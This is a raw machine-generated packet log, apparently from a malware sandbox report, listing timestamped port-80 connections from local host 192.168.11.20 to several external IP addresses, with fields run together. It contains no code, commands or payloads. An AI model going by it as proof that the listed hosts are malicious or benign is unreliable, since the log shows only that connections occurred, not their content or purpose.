                                                                                                                              Dec 4, 2023 15:28:04.203609943 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:05.146704912 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:06.162174940 CET5021680192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:06.350620985 CET8050216217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:06.350999117 CET5021680192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:06.351089001 CET5021680192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:06.539566994 CET8050216217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:06.544097900 CET8050216217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:06.544663906 CET8050216217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:06.544938087 CET5021680192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:06.545017958 CET5021680192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:06.733572006 CET8050216217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:11.701325893 CET5021780192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:11.795996904 CET805021723.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:11.796191931 CET5021780192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:11.796370029 CET5021780192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:11.891093016 CET805021723.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:12.131624937 CET805021723.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:12.131697893 CET805021723.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:12.131822109 CET805021723.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:12.131871939 CET805021723.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:12.131901979 CET5021780192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:12.131917953 CET805021723.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:12.132040024 CET5021780192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:12.132158995 CET5021780192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:13.301173925 CET5021780192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:14.316584110 CET5021880192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:14.411525011 CET805021823.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:14.411782026 CET5021880192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:14.411942005 CET5021880192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:14.507169008 CET805021823.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:14.682645082 CET805021823.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:14.682717085 CET805021823.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:14.682774067 CET805021823.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:14.682823896 CET805021823.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:14.683262110 CET5021880192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:14.683269024 CET805021823.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:14.683620930 CET5021880192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:15.925436020 CET5021880192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:16.941349983 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.036113024 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.036282063 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.037573099 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.037766933 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.133001089 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.133083105 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.133132935 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.133304119 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.133451939 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.133498907 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.133529902 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.133552074 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.133620977 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.133662939 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.133865118 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.133913994 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.134033918 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.134335041 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.228487015 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.228692055 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.229549885 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.229609013 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.229655027 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.229696035 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.229733944 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.229779005 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.229922056 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.230004072 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.230062962 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.230206966 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.230321884 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.230364084 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.230470896 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.230690002 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.325007915 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.325067043 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.325412989 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.325470924 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.325918913 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.325977087 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.561101913 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.561177969 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.561234951 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.561283112 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.561357021 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:17.561562061 CET5021980192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:17.657610893 CET805021923.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:19.565545082 CET5022080192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:19.660092115 CET805022023.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:19.660430908 CET5022080192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:19.660556078 CET5022080192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:19.755152941 CET805022023.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:19.810173035 CET805022023.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:19.810221910 CET805022023.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:19.810254097 CET805022023.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:19.810297966 CET805022023.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:19.810611010 CET5022080192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:19.810611010 CET5022080192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:19.810709000 CET5022080192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:20.111984968 CET5022080192.168.11.2023.227.38.74
                                                                                                                              Dec 4, 2023 15:28:20.206984997 CET805022023.227.38.74192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:25.000699997 CET5022180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:25.183394909 CET805022191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:25.184324980 CET5022180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:25.186373949 CET5022180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:25.369597912 CET805022191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:25.369666100 CET805022191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:25.369868040 CET5022180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:26.688803911 CET5022180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:27.704365969 CET5022280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:27.886435032 CET805022291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:27.886734962 CET5022280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:27.886938095 CET5022280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:28.069636106 CET805022291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:28.069705009 CET805022291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:28.069928885 CET5022280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:29.391388893 CET5022280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.406930923 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.588818073 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.589035988 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.590428114 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.590512037 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.772234917 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772309065 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772357941 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772403955 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772437096 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.772576094 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.772737026 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772783041 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772779942 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.772825003 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772866964 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772906065 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772953033 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.772969007 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.773128033 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.773241043 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.828531981 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.954649925 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.954898119 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.954958916 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.955132008 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.955423117 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.955431938 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.955548048 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.955605030 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.955764055 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.955944061 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.956099987 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:30.956120968 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.956182957 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.956223965 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.956479073 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.956655025 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:30.957233906 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.139326096 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.139385939 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.139429092 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.139518023 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.139692068 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.140122890 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.140186071 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.140418053 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:32.093869925 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.110106945 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.292052984 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.292289972 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.292427063 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.515907049 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560586929 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560736895 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560800076 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560862064 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560926914 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.560935020 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561026096 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561086893 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561144114 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561201096 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561256886 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561306953 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.561688900 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.742947102 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743212938 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743235111 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743275881 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743293047 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743309021 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743324995 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743392944 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.743428946 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743441105 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.743457079 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743732929 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.743863106 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.925494909 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.104357004 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:39.281435013 CET805022591.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.281812906 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:39.281903028 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:39.458740950 CET805022591.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.458811998 CET805022591.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.458861113 CET805022591.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.459145069 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:40.795039892 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:41.810704947 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:41.993710995 CET805022691.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:41.993904114 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:41.994136095 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:42.177057981 CET805022691.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:42.177186012 CET805022691.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:42.177236080 CET805022691.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:42.177463055 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:43.497685909 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.513137102 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.689687014 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.690197945 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.691514969 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.868134975 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868226051 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868310928 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868355036 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868402004 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868405104 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.868474960 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868558884 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868573904 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.868704081 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868745089 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.868803024 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868865013 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868912935 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.869080067 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.045428991 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045455933 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045526028 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045654058 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.045736074 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045774937 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045805931 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.045923948 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045979023 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.046056986 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046084881 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046103954 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046143055 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.046205044 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046230078 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046251059 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046282053 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046300888 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046314001 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.046401978 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046433926 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046453953 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046477079 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046513081 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046533108 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222377062 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222402096 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222428083 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222460985 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222626925 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222696066 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222892046 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222927094 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223200083 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223222971 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223239899 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223256111 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223275900 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223293066 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223479986 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:46.200119972 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.215734959 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.395553112 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:47.395811081 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.395925999 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.574801922 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:47.574867964 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:47.574917078 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:47.575443029 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.575531006 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.754189968 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:52.589529037 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:52.771811962 CET805022991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:52.772058010 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:52.772299051 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:52.954888105 CET805022991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:52.954901934 CET805022991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:52.955100060 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:54.276454926 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:55.292228937 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:55.474997044 CET805023091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:55.475238085 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:55.475392103 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:55.658785105 CET805023091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:55.658859015 CET805023091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:55.659162998 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:56.979038000 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:57.994607925 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.177315950 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.177735090 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.179045916 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.179133892 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.361475945 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.361547947 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.361592054 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.361630917 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.361670971 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.361839056 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.361949921 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.362010956 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.362080097 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.362132072 CET805023191.195.240.19192.168.11.20
